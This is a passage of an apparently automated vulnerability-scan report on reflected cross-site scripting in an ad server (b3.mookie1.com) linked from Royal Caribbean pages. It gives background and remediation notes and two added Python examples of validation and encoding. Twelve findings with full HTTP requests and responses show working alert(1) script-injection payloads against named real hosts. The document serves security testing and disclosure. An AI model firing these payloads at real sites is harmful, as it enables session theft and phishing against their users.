Location: http://vacations.rooms.com/wthrooms/55baf
131faa15b77
?DD=WTHROOMS
Content-Length: 0
Content-Type: text/html;charset=UTF-8


4. Cross-site scripting (reflected)
There are 94 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

Input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain. For example, a campaign or site name carried in a URL path segment, as in the findings below, should be a short token of alphanumeric characters; input which fails validation should be rejected, not sanitised.

User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; and so on).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
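The following is an added example and not part of the XSS.CX/Burp report: it applies the two defence layers just described to the pattern that recurs in the findings below, where a URL path segment is copied into the HREF attribute of an <A> tag on b3.mookie1.com. The rendering functions, the validation rule and the parser-based check are illustrative assumptions; the payload is the one the report submitted as REST URL parameter 2 in finding 4.1.

```python
"""Added example, not part of the XSS.CX/Burp report: the two defence layers
(input validation, output encoding) applied to the pattern reported against
b3.mookie1.com, where a URL path segment is copied into the HREF attribute
of an <A> tag. The rendering functions, validation rule and parser probe are
illustrative assumptions; the payload is the report's (finding 4.1)."""
import re
from html import escape
from html.parser import HTMLParser

# The report appended this to the segment "B3DM"; the value that reached the
# application was the concatenation.
PAYLOAD = '80951"><script>alert(1)</script>0cf9be4239a'
INJECTED_SEGMENT = "B3DM" + PAYLOAD

# Simplified from the response in finding 4.1 (assumption: the real template
# has more path components, which do not change the context).
TEMPLATE = ('<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/'
            '{segment}/DLX/x92/default/empty.gif?x" target="_top">')


def render_link_unsafe(segment):
    """Vulnerable pattern: raw segment inside a double-quoted attribute, so
    a " in it closes the attribute and > closes the tag."""
    return TEMPLATE.format(segment=segment)


def render_link_safe(segment):
    """Layer 2, output encoding: html.escape(quote=True) turns " into &quot;
    and < > & into entities, so the value cannot leave the attribute."""
    return TEMPLATE.format(segment=escape(segment, quote=True))


# Layer 1, input validation (assumption): an ad-campaign segment is a short
# token; reject anything else rather than trying to clean it.
SEGMENT_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def validate_segment(segment):
    return SEGMENT_RE.fullmatch(segment) is not None


class _AnchorProbe(HTMLParser):
    """Records the first <a href> the browser-style parser sees and every
    start tag, so we can tell whether a <script> element materialised."""

    def __init__(self):
        super().__init__()
        self.href = None
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "a" and self.href is None:
            self.href = dict(attrs).get("href")


def probe(markup):
    """Return (href, [start tags]) for the rendered markup; entity references
    inside the attribute are decoded by the parser, as a browser would."""
    p = _AnchorProbe()
    p.feed(markup)
    p.close()
    return p.href, p.tags


if __name__ == "__main__":
    print(probe(render_link_unsafe(INJECTED_SEGMENT)))
    print(probe(render_link_safe(INJECTED_SEGMENT)))
    print(validate_segment("B3DM"), validate_segment(INJECTED_SEGMENT))
```

The probe makes the difference concrete: the unsafe rendering yields an <a> whose href stops at 80951 followed by a real <script> element, while the encoded rendering yields a single <a> whose decoded href still contains the full submitted value, so encoding loses no data. The validation layer rejects the payload outright, which is the right outcome for a path segment that should only ever be a campaign name.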


4.1. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80951"><script>alert(1)</script>0cf9be4239a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM80951"><script>alert(1)</script>0cf9be4239a/DLX/1@x92 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM80951"><script>alert(1)</script>0cf9be4239a/DLX/2048296086/x92/default/empty.gif/4d686437616b364a7257384142793233?x" target="_top"><IMG SR
...[SNIP]...

4.2. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41357"><script>alert(1)</script>17858a976b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX41357"><script>alert(1)</script>17858a976b8/1@x92 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX41357"><script>alert(1)</script>17858a976b8/134632348/x92/default/empty.gif/4d686437616b364a725863414237306c?x" target="_top"><IMG SRC
...[SNIP]...

4.3. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e92"><script>alert(1)</script>bb4cab060f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x9240e92"><script>alert(1)</script>bb4cab060f HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1754400728/x9240e92"><script>alert(1)</script>bb4cab060f/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top"><IMG SRC
...[SNIP]...

4.4. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x92

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92293"-alert(1)-"3ff0c4ea86d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
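The following is an added example and not part of the XSS.CX/Burp report: it shows what encoding for the script-string context looks like when echoing into it cannot be avoided, using the var camp="..." assignment from the response in this finding. The helper names and the token check are illustrative assumptions; the first payload is the report's, and the second, which closes the <script> element itself, is constructed here to show why escaping quotes alone is not enough.

```python
"""Added example, not part of the XSS.CX/Burp report: encoding for the
script-string context reported in finding 4.4, where the name of a
query-string parameter is copied into var camp="...". Helper names and the
token check are illustrative assumptions; PAYLOAD is the report's."""
import json
import re

PAYLOAD = '92293"-alert(1)-"3ff0c4ea86d=1'
# Constructed (not from the report): the other way out of a script string,
# closing the <script> element itself, which quote escaping alone misses.
SCRIPT_BREAKOUT = '</script><script>alert(1)</script>'


def render_script_unsafe(value):
    """Vulnerable pattern from the response: raw value between quotes."""
    return f'var camp="{value}";'


def js_string_literal(value):
    """JSON-encode the value (quotes, backslashes and control characters are
    escaped; ensure_ascii also covers U+2028/2029), then additionally escape
    <, > and & as \\uXXXX so the literal can never contain </script> or an
    HTML comment opener when embedded in a <script> element."""
    out = json.dumps(value)
    return (out.replace("<", "\\u003c")
               .replace(">", "\\u003e")
               .replace("&", "\\u0026"))


def render_script_safe(value):
    return f"var camp={js_string_literal(value)};"


_STRING_TOKEN = re.compile(r'"(?:[^"\\]|\\.)*"')


def string_tokens(js_line):
    """Tokenise double-quoted string literals the way a JS lexer would. A
    correctly encoded assignment yields exactly one token; anything between
    two tokens is code the attacker controls."""
    return _STRING_TOKEN.findall(js_line)


def leaves_script_element(js_line):
    """The HTML parser ends a <script> element at the first </script it sees,
    regardless of JS string state, so this must never appear in the output."""
    return "</script" in js_line.lower()


def decoded_value(js_line):
    """Recover the runtime value of the first string literal; for a safe
    rendering this must equal the original input, proving the encoding is
    lossless (JSON and JS share the \\uXXXX escape syntax)."""
    return json.loads(string_tokens(js_line)[0])


if __name__ == "__main__":
    for v in (PAYLOAD, SCRIPT_BREAKOUT):
        print(render_script_unsafe(v), string_tokens(render_script_unsafe(v)))
        print(render_script_safe(v), string_tokens(render_script_safe(v)))
```

With the report's payload the unsafe line lexes as two string literals with -alert(1)- as live code between them, while the encoded line lexes as one literal that decodes back to the exact input. With the constructed payload the unsafe line is still a single JS string, yet the browser's HTML parser terminates the script element inside it; the \u003c encoding is what prevents that, and it is why JSON encoding alone is not sufficient for script embedding.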

Request

GET /2/B3DM/DLX/1@x92?92293"-alert(1)-"3ff0c4ea86d=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:41:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3249
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="92293"-alert(1)-"3ff0c4ea86d=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){

   if((cookie_check("optouts=",document.cookie)).length == 0) {
       if((cookie_check("dlx_20100929=",d
...[SNIP]...

4.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b899"><script>alert(1)</script>2024fa111c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean4b899"><script>alert(1)</script>2024fa111c/ZAP/1009225881@x96?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean4b899"><script>alert(1)</script>2024fa111c/ZAP/1317562423/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.6. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 220cb"><script>alert(1)</script>ab66dce7cdf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP220cb"><script>alert(1)</script>ab66dce7cdf/1009225881@x96?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP220cb"><script>alert(1)</script>ab66dce7cdf/2103730740/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.7. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1009225881@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b962"><script>alert(1)</script>12e307fef18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1009225881@x968b962"><script>alert(1)</script>12e307fef18?_RM_HTML_title_=Cruise%20Deals%20%26%20Cruise%20Vacations%20-%20Royal%20Caribbean%20International%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/home.do&_RM_HTML_referrer_= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 329
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/498879122/x968b962"><script>alert(1)</script>12e307fef18/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.8. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76222"><script>alert(1)</script>5259198acdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean76222"><script>alert(1)</script>5259198acdc/ZAP/1090617097@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean76222"><script>alert(1)</script>5259198acdc/ZAP/825149334/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.9. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c5f7"><script>alert(1)</script>2e93ec6a50b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP2c5f7"><script>alert(1)</script>2e93ec6a50b/1090617097@x96?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP2c5f7"><script>alert(1)</script>2e93ec6a50b/125903992/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.10. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1090617097@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f00"><script>alert(1)</script>135c929b4df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean/ZAP/1090617097@x9661f00"><script>alert(1)</script>135c929b4df?_RM_HTML_title_=Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/beforeyouboard/home.do%3FcS%3DNAVBAR HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/search/processSearch.do?ip_server=prdiphrase-unstruct-new222.dmz.rccl.com%3A200&ip_text=xss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:43:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean/ZAP/1936432529/x9661f00"><script>alert(1)</script>135c929b4df/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.11. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4740d"><script>alert(1)</script>dceda6e926e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RoyalCaribbean4740d"><script>alert(1)</script>dceda6e926e/ZAP/1154839602@x96?_RM_HTML_title_=Hot%20Deals%20-%20Royal%20Caribbean%20International&_RM_HTML_url_=http%3A//www.royalcaribbean.com/dealsandmore/hotdeals.do%3FcS%3DNAVBAR%26pnav%3D3%26snav%3D1&_RM_HTML_referrer_=http%3A//www.royalcaribbean.com/search/processSearch.do%3Fip_server%3Dprdiphrase-unstruct-new222.dmz.rccl.com%253A200%26ip_text%3Dxss HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.royalcaribbean.com/dealsandmore/hotdeals.do?cS=NAVBAR&pnav=3&snav=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; VolkswagenBTConq=UndertoneB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 338
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RoyalCaribbean4740d"><script>alert(1)</script>dceda6e926e/ZAP/1969330568/x96/default/empty.gif/4d686437616b364a7258674142333038?x" target="_top">
...[SNIP]...

4.12. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RoyalCaribbean/ZAP/1154839602@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71c4"><script>alert(1)</script>279fadd2c16 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

